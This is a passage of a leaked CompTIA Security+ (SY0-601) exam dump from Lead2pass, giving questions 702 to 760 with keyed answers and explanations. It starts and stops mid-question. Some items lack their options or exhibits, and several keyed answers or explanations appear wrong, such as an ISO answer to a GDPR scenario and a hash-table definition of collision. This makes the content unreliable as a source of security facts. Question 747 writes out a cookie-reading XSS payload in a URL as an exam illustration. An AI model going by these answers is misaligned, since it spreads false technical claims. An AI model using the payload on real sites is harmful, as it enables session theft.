VDI?
A.
B.
C.
D.
Shut down the VDI and copy off the event logs.
Take a memory snapshot of the running system.
Use NetFlow to identify command-and-control IPs.
Run a full on-demand scan of the root volume.
Answer: B
Explanation:
Take a snapshot of the VDI would allow to both analyze and temporary isolate the threat as we
can then shut it down to proceed to futher analyze the snapshot.
QUESTION 702
After a recent security incident, a security analyst discovered that unnecessary ports were open
on a firewall policy for a web server.
Which of the following firewall policies would be MOST secure for a web server?
A.
B.
C.
D.
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
246
QUESTION 703
A report delivered to the Chief Information Security Officer (CISO) shows that some user
credentials could be exfiltrated. The report also indicates that users tend to choose the same
credentials on different systems and applications.
Which of the following policies should the CISO use to prevent someone from using the exfiltrated
credentials?
A.
B.
C.
D.
MFA
Lockout
Time-based logins
Password history
Answer: D
Explanation:
Password history - In this scenario, the report stated that some credentials could have been
exfiltrated. This means that an unauthorized transfer of these credentials has occurred, possibly
due to a security breach.
Password history policies determines the number of unique new passwords that must associated
with a user's account before an old password be reused. Essentially forcing users to create new
passwords on a regular basis. The reports that that there are users that reuse the same
credentials and password history policies will be useful as users would have to create new unique
passwords.
MFA could be a preventative measure as an attacker could have their credentials, but with MFA
configured they would still need to have access to whatever the other element(s) that user has
configured for the MFA process. However, this option does not prevent an attacker from using the
exfiltrated credentials which is the primary concern in the scenario; so this doesn't directly
address the issue. As password history policies would prevent previous passwords from being
used after a password change.
QUESTION 704
A user is attempting to navigate to a website from inside the company network using a desktop.
When the user types in the URL. https://www.site.com, the user is presented with a certificate
mismatch warning from the browser. The user does not receive a warning when visiting
http://www.anothersite.com. Which of the following describes this attack?
A.
B.
C.
D.
On-path
Domain hijacking
DNS poisoning
Evil twin
Answer: C
Explanation:
DNS poisoning - DNS poisoning occurs when hackers gain access to a DNS server and begins to
redirect traffic to a different IP address by alternating a DNS record.
For this question, DNS poisoning on HTTPS will result in a certificate mismatch error, which
means a DNS record has been altered.
QUESTION 705
A new company wants to avoid channel interference when building a WLAN. The company needs
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
247
to know the radio frequency behavior, identify dead zones, and determine the best place for
access points. Which of the following should be done FIRST?
A.
B.
C.
D.
Configure heat maps.
Utilize captive portals.
Conduct a site survey.
Install Wi-Fi analyzers.
Answer: C
QUESTION 706
Which of the following tools is effective in preventing a user from accessing unauthorized
removable media?
A.
B.
C.
D.
USB data blocker
Faraday cage
Proximity reader
Cable lock
Answer: A
Explanation:
A USB data blocker, also known as a “USB condom” (really, no kidding!), is a device that allows
you to plug into USB charging ports including charging kiosks, and USB ports on gadgets owned
by other people.
The main purpose of using one is to eliminate the risk of infecting your phone or tablet with
malware, and even prevent hackers to install/execute any malicious code to access your data.
QUESTION 707
An engineer wants to inspect traffic to a cluster of web servers in a cloud environment.
Which of the following solutions should the engineer implement?
A.
B.
C.
D.
Proxy server
WAF
Load balancer
VPN
Answer: B
QUESTION 708
A user enters a username and a password at the login screen for a web portal. A few seconds
later the following message appears on the screen: Please use a combination of numbers,
special characters, and letters in the password field.
Which of the following concepts does this message describe?
A.
B.
C.
D.
Password complexity
Password reuse
Password history
Password age
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
248
Explanation:
Password complexity - is the method that obligate users to use passwords this some
characteristics. (like more than X characters, use numbers symbols and letters).
QUESTION 709
An incident has occurred in the production environment.
Analyze the command outputs and identify the type of compromise. If at any time you would like
to bring back the initial state of the simulation, please click the Reset All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
249
Answer:
Logic Bomb and Backdoor
Explanation:
First compromise relies on a cronjob that will be executed each five minutes
Second compromise is opening port 31337 , https://www.eicar.org/download/eicar.com.txt is a file
to test AV products, instead of using real malware, which could cause real damage, this test file
allows people to test anti-virus software without having to use a real computer virus.
QUESTION 710
Data exfiltration analysis indicates that an attacker managed to download system configuration
notes from a web server. The web-server logs have been deleted, but analysts have determined
that the system configuration notes were stored in the database administrator's folder on the web
server. Which of the following attacks explains what occurred? (Choose two.)
A.
B.
C.
D.
E.
F.
Pass-the-hash
Directory traversal
SQL injection
Privilege escalation
Cross-site scripting
Request forgery
Answer: BD
Explanation:
The simplest example of a directory traversal attack is when an application displays or allows the
user to download a file via a URL parameter.
Directory traversal is a type of HTTP exploit in which a hacker uses the software on a web server
to access data in a directory other than the server's root directory. If the attempt is successful, the
threat actor can view restricted files or execute commands on the server.
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an
operating system or software application to gain elevated access to resources that are normally
protected from an application or user.
QUESTION 711
Which of the following is the MOST effective control against zero-day vulnerabilities?
A.
B.
C.
D.
Network segmentation
Patch management
Intrusion prevention system
Multiple vulnerability scanners
Answer: A
Explanation:
IPS can only protect against known host and application-based attacks and exploits. IPS inspects
traffic against signatures and anomalies, it does cover a broad spectrum of attack types, most of
them signature-based, and signatures alone cannot protect against zero-day attacks.
However, with network segmentation, you're able to isolate critical assets into different segments.
And when a zero-day attack occurs, you're not at risk of losing all and are able to isolate the
attack's effect to one segment.s.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
250
QUESTION 712
Which of the following organizations sets frameworks and controls for optimal security
configuration on systems?
A.
B.
C.
D.
ISO
GDPR
PCI DSS
NIST
Answer: A
Explanation:
NIST CSF - The US National Institute of Standards and Technology framework for improving
critical infrastructure cybersecurity
CIS - The Center for Internet Security critical security controls
ISO/IEC 27001 and 27002 - The International Standards Organization frameworks for best
practices around security management and controls
QUESTION 713
Which of the following describes the exploitation of an interactive process to gain access to
restricted areas?
A.
B.
C.
D.
Persistence
Buffer overflow
Privilege escalation
Pharming
Answer: C
Explanation:
Exploitation of interactive process is the commandline from where exploits can be run to gain root
permissions in a system.
QUESTION 714
Which of the following is a known security risk associated with data archives that contain financial
information?
A.
B.
C.
D.
Data can become a liability if archived longer than required by regulatory guidance
Data must be archived off-site to avoid breaches and meet business requirements
Companies are prohibited from providing archived data to e-discovery requests
Unencrypted archives should be preserved as long as possible and encrypted
Answer: A
Explanation:
https://www.ontrack.com/en-gb/blog/archiving-risk-security-risks-associated-with-tape-storage
QUESTION 715
A large bank with two geographically dispersed data centers is concerned about major power
disruptions at both locations. Every day each location experiences very brief outages that last for
a few seconds. However, during the summer a high risk of intentional brownouts that last up to an
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
251
hour exists, particularly at one of the locations near an industrial smelter. Which of the following is
the BEST solution to reduce the risk of data loss?
A.
B.
C.
D.
E.
Dual supply
Generator
UPS
PDU
Daily backups
Answer: C
Explanation:
A UPS is always required to protect against any interruption to computer services. A back up
generator cannot be brought online fast enough to respond to a power failure.
QUESTION 716
Several universities are participating m a collaborative research project and need to share
compute and storage resources.
Which of the following cloud deployment strategies would BEST meet this need?
A.
B.
C.
D.
Community
Private
Public
Hybrid
Answer: A
QUESTION 717
An organization has activated an incident response plan due to a malware outbreak on its
network. The organization has brought in a forensics team that has identified an internet-facing
Windows server as the likely point of initial compromise. The malware family that was detected is
known to be distributed by manually logging on to servers and running the malicious code. Which
of the following actions would be BEST to prevent reinfection from the infection vector?
A.
B.
C.
D.
Prevent connections over TFTP from the internal network.
Create a firewall rule that blocks port 22 from the internet to the server.
Disable file sharing over port 445 to the server.
Block port 3389 inbound from untrusted networks.
Answer: D
Explanation:
3389 is the default port for RDP connections. RDP is the protocol used to connect to windows
desktops/servers remotely. In the scenario, the malware family is known to be distributed through
manually logging on to servers and RDP would require a manual login to access the machine and
be able to easily run scripts on the server especially through a GUI.
QUESTION 718
A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately
protected from advanced threats and malware. The CSO believes there is a high risk that a data
breach could occur in the near future due to the lack of detective and preventive controls. Which
of the following should be implemented to BEST address the CSO's concerns? (Choose two.)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
252
A.
B.
C.
D.
E.
F.
A WAF
A CASB
An NG-SWG
Segmentation
Encryption
Containerization
Answer: BC
Explanation:
NG-SWG -> NG SWG) is designed to address the key cloud and web security use cases
encompassing granular policy controls, web filtering, threat protection, and data protection
spanning managed and unmanaged apps, cloud services, and web traffic.
CASB The CASB serves as a policy enforcement center, consolidating multiple types of security
policy enforcement and applying them to everything your business utilizes in the cloud regardless of what sort of device is attempting to access it, including unmanaged smartphones,
IoT devices, or personal laptops.
QUESTION 719
Field workers in an organization are issued mobile phones on a daily basis. All the work is
performed within one city, and the mobile phones are not used for any purpose other than work.
The organization does not want these phones used for personal purposes. The organization
would like to issue the phones to workers as permanent devices so the phones do not need to be
reissued every day. Given the conditions described, which of the following technologies would
BEST meet these requirements?
A.
B.
C.
D.
Geofencing
Mobile device management
Containerization
Remote wiping
Answer: B
Explanation:
MDM is the best solution here, Company wants to issue a COBO device therefore no
containerization < - tailored to BYOD
Geofencing and remote wiping are capabilites that are provided by an MDM solution.
QUESTION 720
During a recent incident an external attacker was able to exploit an SMB vulnerability over the
internet.
Which of the following action items should a security analyst perform FIRST to prevent this from
occurring again?
A.
B.
C.
D.
Check for any recent SMB CVEs
Install AV on the affected server
Block unneeded TCP 445 connections
Deploy a NIDS in the affected subnet
Answer: C
Explanation:
Blocking unneeded TCP 445 connections should be performed FIRST as it would prevent the
SMB vulnerability from being used.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
253
QUESTION 721
Business partners are working on a security mechanism to validate transactions securely. The
requirement is for one company to be responsible for deploying a trusted solution that will register
and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is
the BEST solution to adopt?
A.
B.
C.
D.
PKI
Blockchain
SAML
OAuth
Answer: A
Explanation:
PKI involves one trusted third-party or middleman which is the company.
Blockchain is a decentralized or distributed system.
QUESTION 722
An organization wants to participate in threat intelligence information sharing with peer groups.
Which of the following would MOST likely meet the organizations requirement?
A.
B.
C.
D.
Perform OSINT investigations
Subscribe to threat intelligence feeds
Submit RFCs
Implement a TAXII server
Answer: D
Explanation:
A TAXII server is a client that exchanges standardized and anonymized cyber threat intelligence
among users. It works as a venue for sharing and collecting Indicators of compromise, which
have been anonymized to protect privacy.
QUESTION 723
An organization has developed an application that needs a patch to fix a critical vulnerability.
In which of the following environments should the patch be deployed LAST?
A.
B.
C.
D.
Test
Staging
Development
Production
Answer: D
Explanation:
The production environment is the live system. Software, patches, and other changes that have
been tested and approved move to production.
QUESTION 724
Which of the following risk management strategies would an organization use to maintain a
legacy system with known risks for operational purposes?
A. Acceptance
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
254
B. Transference
C. Avoidance
D. Mitigation
Answer: A
Explanation:
Accepting risk, or risk acceptance, occurs when a business or individual acknowledges that the
potential loss from a risk is not great enough to warrant spending money to avoid it.
QUESTION 725
A social media company based in North America is looking to expand into new global markets
and needs to maintain compliance with international standards.
With which of the following is the company's data protection officer MOST likely concerned?
A.
B.
C.
D.
NIST Framework
ISO 27001
GDPR
PCI-DSS
Answer: B
Explanation:
NIST is considered best for organizations that are in the early stages of developing a risk
management plan. ISO 27001, comparatively, is better for operationally mature organizations.
QUESTION 726
Several users have opened tickets with the help desk. The help desk has reassigned the tickets
to a security analyst for further review.
The security analyst reviews the following metrics:
Which of the following is MOST likely the result of the security analyst's review?
A.
B.
C.
D.
The ISP is dropping outbound connections
The user of the Sales-PC fell for a phishing attack
Corporate PCs have been turned into a botnet
An on-path attack is taking place between PCs and the router
Answer: C
QUESTION 727
A security analyst wants to fingerprint a web server. Which of the following tools will the security
analyst MOST likely use to accomplish this task?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
255
A.
B.
C.
D.
nmap -pl-65535 192.168.0.10
dig 192.168.0.10
curl --head http://192.168.0.10
ping 192.168.0.10
Answer: C
Explanation:
curl -- head is similar to curl get. Remember from your studies that get is when a user/entity is
requesting to get/download resources from a server across the internet. Get requests include a
header and a body. By doing curl --head, you're sending a request to get information from a
server. The server will reply by providing only the headers of the request, rather than including
the body. Therefore a curl -- head is a way to send requests for header-only get requests. This
allows people a quick summary of a response server, or in this case, to view it's fingerprint.
QUESTION 728
A security analyst is working on a project to implement a solution that monitors network
communications and provides alerts when abnormal behavior is detected.
Which of the following is the security analyst MOST likely implementing?
A.
B.
C.
D.
Vulnerability scans
User behavior analysis
Security orchestration, automation, and response
Threat hunting
Answer: B
Explanation:
User behavior analysis is under Syslog/Security information and event management (SIEM)
under the exam objectives. SIEM is to provide alert, while SOAR goes beyond that.
QUESTION 729
Which of the following provides a calculated value for known vulnerabilities so organizations can
prioritize mitigation steps?
A.
B.
C.
D.
CVSS
SIEM
SOAR
CVE
Answer: A
Explanation:
CVSS is maintained by the Forum of Incident Response and Security Teams (first.org/cvss).
CVSS metrics generate a score from 0 to 10 based on characteristics of the vulnerability, such as
whether it can be triggered remotely or needs local access, whether user intervention is required,
and so on.
QUESTION 730
A Chief Information Security Officer has defined resiliency requirements for a new data center
architecture.
The requirements are as follows:
- Critical fileshares will remain accessible during and after a natural disaster
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
256
- Five percent of hard disks can fail at any given time without impacting the data.
- Systems will be forced to shut down gracefully when battery levels are below 20%
Which of the following are required to BEST meet these objectives? (Select THREE)
A.
B.
C.
D.
E.
F.
G.
H.
I.
Fiber switching
laC
NAS
RAID
UPS
Redundant power supplies
Geographic dispersal
Snapshots
Load balancing
Answer: DEG
Explanation:
RAID covers the 5% disk failure
UPS covers the graceful shutdown
Geo Disp covers the critical file shares remain available during disaster
QUESTION 731
An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages,
and SFTP, and to specifically block FTP.
Which of the following would BEST accomplish this goal?
A. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Deny: Any Any 21
Deny: Any Any
B. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Deny: Any Any 22
Allow: Any Any 21
Deny: Any Any
C. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 22
Deny: Any Any 67
Deny: Any Any 68
Deny: Any Any 21
Allow: Any Any
D. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
257
Deny: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Allow: Any Any 21
Allow: Any Any
Answer: A
Explanation:
DHCP ports are 67,68, FTP:21, SFTP:22, and web pages are accessed through 443 and
insecure http 80.
QUESTION 732
A forensic analyst needs to prove that data has not been tampered with since it was collected.
Which of the following methods will the analyst MOST likely use?
A.
B.
C.
D.
Look for tampering on the evidence collection bag
Encrypt the collected data using asymmetric encryption
Ensure proper procedures for chain of custody are being followed
Calculate the checksum using a hashing algorithm
Answer: D
Explanation:
A checksum is specifically intended to verify the integrity of data or find data corruption.
Comparing a file's original and current checksum. And if a byte or even a piece of the file's data
has been changed, the original and current checksum will be different, and therefore you will
know whether it's the same file or not.
QUESTION 733
A systems administrator reports degraded performance on a virtual server. The administrator
increases the virtual memory allocation which improves conditions, but performance degrades
again after a few days. The administrator runs an analysis tool and sees the following output:
==3214==
==3214==
==3214==
==3214==
==3214==
timeAttend.exe analyzed
ERROR SUMMARY:
malloc/free: in use at exit: 4608 bytes in 18 blocks.
checked 82116 bytes
definitely lost: 4608 bytes in 18 blocks.
The administrator terminates the timeAttend.exe observes system performance over the next few
days, and notices that the system performance does not degrade.
Which of the following issues is MOST likely occurring?
A.
B.
C.
D.
DLL injection
API attack
Buffer overflow
Memory leak
Answer: D
Explanation:
Memory leak occurs when programmers create a memory in heap and forget to delete it.
The consequences of memory leak is that it reduces the performance of the computer by
reducing the amount of available memory. Eventually, in the worst case, too much of the
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
258
available memory may become allocated and all or part of the system or device stops working
correctly, the application fails, or the system slows down vastly .
QUESTION 734
An enterprise has hired an outside security firm to conduct penetration testing on its network and
applications. The firm has been given all the developer's documentation about the internal
architecture. Which of the following BEST represents the type of testing that will occur?
A.
B.
C.
D.
Bug bounty
Black-box
Gray-box
White-box
Answer: D
Explanation:
In White Box testing internal structure (code) is known.
In Black Box testing internal structure (code) is unknown.
In Grey Box Testing internal structure (code) is partially known.
White box penetration testing, sometimes referred to as crystal or oblique box pen testing,
involves sharing full network and system information with the tester, including network maps and
credentials. This helps to save time and reduce the overall cost of an engagement.
QUESTION 735
An organization has decided to purchase an insurance policy because a risk assessment
determined that the cost to remediate the risk is greater than the five-year cost of the insurance
policy. The organization is enabling risk:
A.
B.
C.
D.
avoidance
acceptance
mitigation
transference
Answer: D
QUESTION 736
Which of the following is the GREATEST security concern when outsourcing code development
to third-party contractors for an internet-facing application?
A.
B.
C.
D.
Intellectual property theft
Elevated privileges
Unknown backdoor
Quality assurance
Answer: C
Explanation:
GREATEST security concern would be unknown backdoor.
QUESTION 737
A company is auditing the manner in which its European customers' personal information is
handled.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
259
Which of the following should the company consult?
A.
B.
C.
D.
GDPR
ISO
NIST
PCI DSS
Answer: A
Explanation:
GDPR - General Data Protection Regulation is a regulation in EU laws that requires businesses
to protect the personal data and privacy of EU citizens for transactions that occur within EU
member states.
ISO (International Organization for Standardization) - An independent, non-governmental
organization that develops standards to ensure the quality, safety and efficiency of products,
services and systems.
NIST (National Institute of Standards and Technology) - A non-regulatory US government agency
created to develop cybersecurity standards, guidelines, best practices, and other resources to
meet the needs of U.S. industry, federal agencies and the broader public.
PCI DSS (Payment Card Industry Data Security Standard) - A set of security standards for
organizations that handle credit cards from major card schemes.
QUESTION 738
A security analyst is designing the appropriate controls to limit unauthorized access to a physical
site. The analyst has a directive to utilize the lowest possible budget. Which of the following would
BEST meet the requirements?
A.
B.
C.
D.
Preventive controls
Compensating controls
Deterrent controls
Detective controls
Answer: C
Explanation:
Deterrence is designed to reduce the occurrence of unintentional bystanders or unmotivated
malicious agents from entering the site.
QUESTION 739
An administrator needs to protect user passwords and has been advised to hash the passwords.
Which of the following BEST describes what the administrator is being advised to do?
A. Perform a mathematical operation on the passwords that will convert them into unique strings.
B. Add extra data to the passwords so their length is increased, making them harder to brute
force.
C. Store all passwords in the system in a rainbow table that has a centralized location.
D. Enforce the use of one-time passwords that are changed for every login session.
Answer: A
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
260
Common uses of hashing algorithms are to store computer passwords and to ensure message
integrity. The idea is that hashing can produce a unique value that corresponds to the data
entered, but the hash value is also reproducible by anyone else running the same algorithm
against the data.
QUESTION 740
Which of the following would BEST provide a systems administrator with the ability to more
efficiently identify systems and manage permissions and policies based on location, role, and
service level?
A.
B.
C.
D.
Standard naming conventions
Domain services
Baseline configurations
Diagrams
Answer: A
Explanation:
A standard naming convention for hardware assets, and for digital assets such as accounts and
virtual machines, makes the environment more consistent. This means that errors are easier to
spot and that it is easier to automate through scripting. The naming strategy should allow
administrators to identify the type and function of any particular resource or location at any point
in the CMDB or network directory. Each label should conform to rules for host and DNS names.
Domain Services - Services that stores centralized directory information and lets users and
domains communicate. When a user attempts to connect to a device or resource on a network,
this service provides login authentication, verifying the user's login credentials and access
permissions.
Baseline configuration - A documented set of specifications for an information system, or a
configuration item within a system, that has been formally reviewed and agreed on at a given
point in time, and which can be changed only through change control procedures.
QUESTION 741
During an incident response, an analyst applied rules to all inbound traffic on the border firewall
and implemented ACLs on each critical server. Following an investigation, the company realizes it
is still vulnerable because outbound traffic is not restricted, and the adversary is able to maintain
a presence in the network.
In which of the following stages of the Cyber Kill Chain is the adversary currently operating?
A.
B.
C.
D.
Reconnaissance
Command and control
Actions on objective
Exploitation
Answer: B
Explanation:
Command and control (C2) - establishment of outbound communications from a victim system for
secure communications between victim and adversary systems. Compromised hosts typically
beacon out and await further instruction or exploit when higher order interaction or data exchange
is required. This is the hallmark of advanced persistent threat (APT) attacks and data exfiltration.
QUESTION 742
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
261
Which of the following terms describes a broad range of information that is sensitive to a specific
organization?
A.
B.
C.
D.
Public
Top secret
Proprietary
Open-source
Answer: C
Explanation:
Proprietary information, also known as a trade secret, is information a company wishes to keep
confidential.
- Data that is the property of an organization
- May also include trade secrets
- Often data unique to an organization
QUESTION 743
A company suspects that some corporate accounts were compromised. The number of
suspicious logins from locations not recognized by the users is increasing.
Employees who travel need their accounts protected without the risk of blocking legitimate login
requests that may be made over new sign-in properties. Which of the following security controls
can be implemented?
A.
B.
C.
D.
Enforce MFA when an account request reaches a risk threshold.
Implement geofencing to only allow access from headquarters
Enforce time-based login requests that align with business hours
Shift the access control scheme to a discretionary access control
Answer: A
Explanation:
Enforce MFA is the most convenient way. This is likely the most convenient implementation that
would work for all employees as an additional element(s) would need to be needed for
authentication/authorization.
(B) - Implementing geofencing to only allow access from headquarters might stop the suspicious
logins, however, it would be inconvenient for employees not physically located near headquarters
such as the traveling employees.
(C) Enforcing time-based login requests to align with business hours could also be inconvenient
for traveling/global employees that work in different times compared the business's normal
business hours.
(D) With Discretionary access control, the owner of a resource can decide who can have access
to the resource and you can modify the access at anytime. The option to shift the access control
scheme to a discretionary access control wouldn't really address the login issue either if the
account of someone who is authorized to access a resource was compromised. The attacker can
still access the resource using their credentials.
QUESTION 744
Which of the following would be indicative of a hidden audio file found inside of a piece of source
code?
A. Steganography
B. Homomorphic encryption
C. Cipher surte
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
262
D. Blockchain
Answer: A
Explanation:
Steganography is the technique of hiding secret data within an ordinary, non-secret, file or
message in order to avoid detection. It's essentially being able to hide in plain sight. The question
is referring to a hidden file not some form of encryption, Steganography is not an encryption
method but can be used with encryption to add an extra step for protecting data.
Homomorphic encryption - An encryption algorithm designed to allow calculations to be
performed on the encrypted data without requiring access to a secret key to decrypt the data. The
result of such a computation remains in encrypted form, and can at a later point, the original data
can be accessed with the proper decryption key. This allows critical and sensitive data to be
outsourced to third-parties without posing a serious risk to the original owner of that data.
Cipher suite - Algorithms/Instructions required to enable secure network connections between
servers and clients through TLS(SSL).
Blockchain - A shared, immutable ledger that facilitates the process of recording transactions and
tracking assets in a business network.
QUESTION 745
A software company adopted the following processes before releasing software to production:
- Peer review
- Static code scanning
- Signing
A considerable number of vulnerabilities are still being detected when code is executed on
production.
Which of the following security tools can improve vulnerability detection on this environment?
A.
B.
C.
D.
File integrity monitonng for the source code
Dynamic code analysis tool
Encrypted code repository
Endpoint detection and response solution
Answer: A
QUESTION 746
An organization is migrating several SaaS applications that support SSO. The security manager
wants to ensure the migration is completed securely. Which of the following application
integration aspects should the organization consider before focusing into underlying
implementation details? (Choose two.)
A.
B.
C.
D.
E.
F.
The back-end directory source
The identity federation protocol
The hashing method
The encryption method
The registration authority
The certificate authority
Answer: BF
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
263
Certification covers both encryption and hashing.
QUESTION 747
A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible
section of the company's website.
The malicious actor posted an entry in an attempt to trick users into cltckmg the following:
https://www.cOmptla.com/contactus/3Fname%3D%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Which of the following was MOST likely observed?
A.
B.
C.
D.
DLL injection
Session replay
SQLi
XSS
Answer: D
QUESTION 748
During an incident response process involving a laptop, a host was identified as the entry point
for malware. The management team would like to have the laptop restored and given back to the
user. The cybersecurity analyst would like to continue investigating the intrusion on the host.
Which of the following would allow the analyst to continue the investigation and also return the
laptop to the user as soon as possible?
A.
B.
C.
D.
dd
memdump
tcpdump
head
Answer: A
Explanation:
dd will give you a raw image of System that can be used in tools like Autopsy or FTK to analyse
without the risk of damaging the original data/device. Also it would allow you to return the device,
and continue analyzing the dd copy.
QUESTION 749
A Chief Information Security Officer wants to ensure the organization is validating and checking
the Integrity of zone transfers.
Which of the following solutions should be implemented?
A.
B.
C.
D.
DNSSEC
LOAPS
NGFW
DLP
Answer: A
Explanation:
A zone file is a text based file with a format defined in RFC 1035 and 1034 and is stored on a
DNS server (name server). Zone files contain the IP and name data, MX records and other
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
264
service records. They also contain glue data that connects them to the other DNS servers.The
default behavior for DNS zone transfer permits any host to request and receive a full zone
transfer for a Domain. This is a security issue since DNS data can be used to decipher the
topology of a company’s network. The information obtained can be used for malicious exploitation
such as DNS poisoning/spoofing.
This is like an anonymous person calling the receptionist to request and receive the entire
company’s telephone and address book.
QUESTION 750
To reduce and limit software and infrastructure costs, the Chief Information Officer has requested
to move email services to the cloud. The cloud provider and the organization must have security
controls to protect sensitive data.
Which of the following cloud services would BEST accommodate the request?
A.
B.
C.
D.
laas
Paas
Daas
SaaS
Answer: D
Explanation:
SaaS allows people to use cloud-based web applications. In fact, email services such as Gmail
and Hotmail are examples of cloud-based SaaS services.
QUESTION 751
An audit identified PII being utilized in the development environment of a critical application. The
Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers
are concerned that without real data they cannot perform functionality tests and search for
specific data.
Which of the following should a security professional implement to BEST satisfy both the CPO's
and the development team's requirements?
A.
B.
C.
D.
Data anonymization
Data encryption
Data masking
Data tokenization
Answer: A
Explanation:
Data anonymization is the alteration process of personally identifiable information (PII) in a
dataset, to protect individual identification. This way the data can be used and still be protected.
QUESTION 752
Which of the following are the BEST ways to implement remote home access to a company's
intranet systems if establishing an always-on VPN is not an option? (Select Two)
A.
B.
C.
D.
E.
Install VPN concentrations at home offices
Create NAT on the firewall for intranet systems
Establish SSH access to a jump server
Implement a SSO solution
Enable MFA for intranet systems
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
265
F. Configure SNMPv3 server and clients.
Answer: AE
QUESTION 753
Which of the following control types fixes a previously identified issue and mitigates a risk?
A.
B.
C.
D.
Detective
Corrective
Preventative
Finalized
Answer: B
QUESTION 754
A security analyst has identified malware spreading through the corporate network and has
activated the CSIRT Which of the following should the analyst do NEXT?
A.
B.
C.
D.
Review how the malware was introduced to the network.
Attempt to quarantine all infected hosts to limit further spread.
Create help desk tickets to get infected systems reimaged.
Update all endpoint antivirus solutions with the latest updates.
Answer: B
Explanation:
As soon as the malware was identified, the incident response begins. The steps for incident
response are:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for
a future incident.
In the scenario, the malware has already been identified, which means that we are past the
Identification step. The next step would be to begin containment as to limit the amount of damage
the malware can cause, so, quarantining infected hosts would be the best option here.
QUESTION 755
A security analyst reviews web server logs and notices the following lines:
Which of the following vulnerabilities has the attacker exploited? (Choose two.)
A. Race condition
B. LFI
C. Pass the hash
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
266
D. XSS
E. RFI
F. Directory traversal
Answer: BF
Explanation:
LFI
Local File Inclusion is an attack technique in which attackers trick a web application into either
running or exposing files on a web server. LFI attacks can expose sensitive information, and in
severe cases, they can lead to cross-site scripting (XSS) and remote code execution. LFI is listed
as one of the OWASP Top 10 web application vulnerabilities.
RFI
Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that
dynamically reference external scripts. The perpetrator’s goal is to exploit the referencing function
in an application to upload malware (e.g., backdoor shells) from a remote URL located within a
different domain.
QUESTION 756
An attacker replaces a digitally signed document with another version that goes unnoticed. Upon
reviewing the document’s contents, the author notices some additional verbiage that was not
originally in the document but cannot validate an integrity issue. Which of the following attacks
was used?
A.
B.
C.
D.
Cryptomalware
Hash substitution
Collision
Phising
Answer: C
Explanation:
When two or more synonymous keys map to the same table position, a collision is said to occur.
QUESTION 757
During a recent security assessment, a vulnerability was found in a common OS, The OS vendor
was unaware of the issue and promised to release a patch within next quarter. Which of the
following BEST describes this type of vulnerability?
A.
B.
C.
D.
Legacy operating system
Weak configuration
Zero day
Supply chain
Answer: C
Explanation:
"OS vendor was unaware" it indicates Zero Day.
QUESTION 758
A network engineer created two subnets that will be used for production and development
servers. Per security policy, production and development servers must each have a dedicated
network that cannot communicate with one another directly.
Which of the following should be deployed so that server administrators can access these
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
267
devices?
A.
B.
C.
D.
VLANS
Internet proxy servers
NIDS
Jump servers
Answer: D
Explanation:
A jump server, jump host or jump box is a system on a network used to access and manage
devices in a separate security zone. A jump server is a hardened and monitored device that
spans two dissimilar security zones and provides a controlled means of access between them.
QUESTION 759
The Chief Information Security Officer (CISO) of a bank recently updated the incident response
policy. The CISO is concerned that members of the incident response team do not understand
their roles. The bank wants to test the policy but with the least amount of resources or impact.
Which of the following BEST meets the requirements?
A.
B.
C.
D.
Warm site failover
Tabletop walk-through
Parallel path testing
Full outage simulation
Answer: B
Explanation:
Tabletop exercises
• Performing a full-scale disaster drill can be costly
- And time consuming
• Many of the logistics can be determined throughanalysis
- You don’t physically have to go through a disaster or drill
• Get key players together for a tabletop exercise
- Talk through a simulated disaster
QUESTION 760
A company has a flat network in the cloud. The company needs to implement a solution to
segment its production and non-production servers without migrating servers to a new network.
Which of the following solutions should the company implement?
